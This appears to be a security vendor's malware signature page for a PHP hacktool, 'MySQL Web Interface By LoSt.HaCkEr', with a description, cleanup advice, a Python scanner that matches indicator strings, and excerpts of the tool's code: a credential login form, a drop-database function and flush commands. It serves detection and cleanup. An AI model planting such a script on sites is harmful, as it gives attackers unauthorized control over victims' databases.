Malware Signatures


php.hacktool.sql_sniper_hex.002

Many popular web applications such as WordPress, Joomla, vBulletin and osCommerce rely on a database, specifically MySQL.
Most of the data these applications work with is stored in the database, and quite a few applications store configuration information there as well.
That's why hackers don't forget about it and try to exploit it as much as possible. For example, hackers inject spammy links and scripts directly into posts stored in the database,
or they change configuration records to make the site redirect visitors to third-party sites. To work with MySQL databases, hackers use various scripts: from highly targeted,
customized scripts that can do only one specific thing to scripts that provide access to broad MySQL functionality, such as Adminer scripts.

MySQL Web Interface By LoSt.HaCkEr is a simple interface that provides attackers with basic functionality: view, edit and delete databases and tables,
change user permissions, work with data and of course, execute arbitrary SQL queries.

Affecting

Any server with PHP enabled and MySQL installed

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.
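
As a first pass for the scan step, the following added example (not part of the original signature or of any vendor tooling) walks a web root and flags PHP files that contain the markers visible in the dump excerpt on this page. The extension list, the two-marker threshold and the sample files in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Markers taken from the dump excerpt on this page.
INDICATORS = {
    "banner": re.compile(rb"MySQL Web Interface By LoSt\.HaCkEr", re.I),
    "author": re.compile(rb"sNiper_hEx", re.I),
    "cookies": re.compile(rb"mysql_web_admin_(username|password|hostname)"),
    "drop_db": re.compile(rb"mysql_drop_db\s*\("),
}
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")  # assumed list; extend for your server
MIN_HITS = 2  # assumption: require two distinct markers to cut false positives


def match_indicators(data: bytes) -> list[str]:
    """Return the names of the indicators found in a file's raw bytes."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))


def scan_tree(root: str, max_bytes: int = 2_000_000) -> dict[str, list[str]]:
    """Walk a web root and report PHP files matching at least MIN_HITS markers."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits = match_indicators(fh.read(max_bytes))
            except OSError:
                continue  # unreadable file: skip it, do not abort the scan
            if len(hits) >= MIN_HITS:
                findings[path] = hits
    return findings


def demo() -> dict[str, list[str]]:
    """Scan a constructed directory holding one flagged and one clean file."""
    flagged = b'<?php /* MySQL Web Interface By LoSt.HaCkEr */ setcookie( "mysql_web_admin_username" );'
    clean = b"<?php mysql_drop_db($old, $link); // legacy maintenance script"
    with tempfile.TemporaryDirectory() as root:
        for fname, body in (("db.php", flagged), ("cron.php", clean)):
            with open(os.path.join(root, fname), "wb") as fh:
                fh.write(body)
        return {os.path.basename(p): h for p, h in scan_tree(root).items()}


if __name__ == "__main__":
    print(demo())
```

Plain string matching only catches unobfuscated copies of the script, so a clean result here does not replace the full malware and backdoor scan described above.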

Dump

... excerpts ...

/*
* MySQL Web Interface By LoSt.HaCkEr
* -------------------------------
* Developed By sNiper_hEx
*/

...

function logon() {
global $PHP_SELF;

setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
setcookie( "mysql_web_admin_hostname" );
echo "<html>\n";
echo "<head>\n";
echo "<title>MySQL New by LoSt.HaCkEr</title>\n";
echo "</head>\n";
echo "<body>\n";
echo "<table width=100% height=100%><tr><td><center>\n";
echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
echo "<h1>MySQL Web by LoSt.HaCkEr</h1>\n";
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=logon_submit>\n";
echo "<table cellpadding=5 cellspacing=1>\n";
echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";

...

function dropDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_drop_db( $dbname, $mysqlHandle );
listDatabases();
}

function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;

echo "<h1>Tables List</h1>\n";
echo "<p class=location>$dbname</p>\n";
echoQueryResult();

...

echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
if( $command == "flush_logs" ) {
if( mysql_query( "Flush logs" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
if( $command == "flush_privileges" ) {
if( mysql_query( "Flush privileges" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
if( $command == "flush_tables" ) {
if( mysql_query( "Flush tables" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
if( $command == "flush_status" ) {
if( mysql_query( "Flush status" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";

...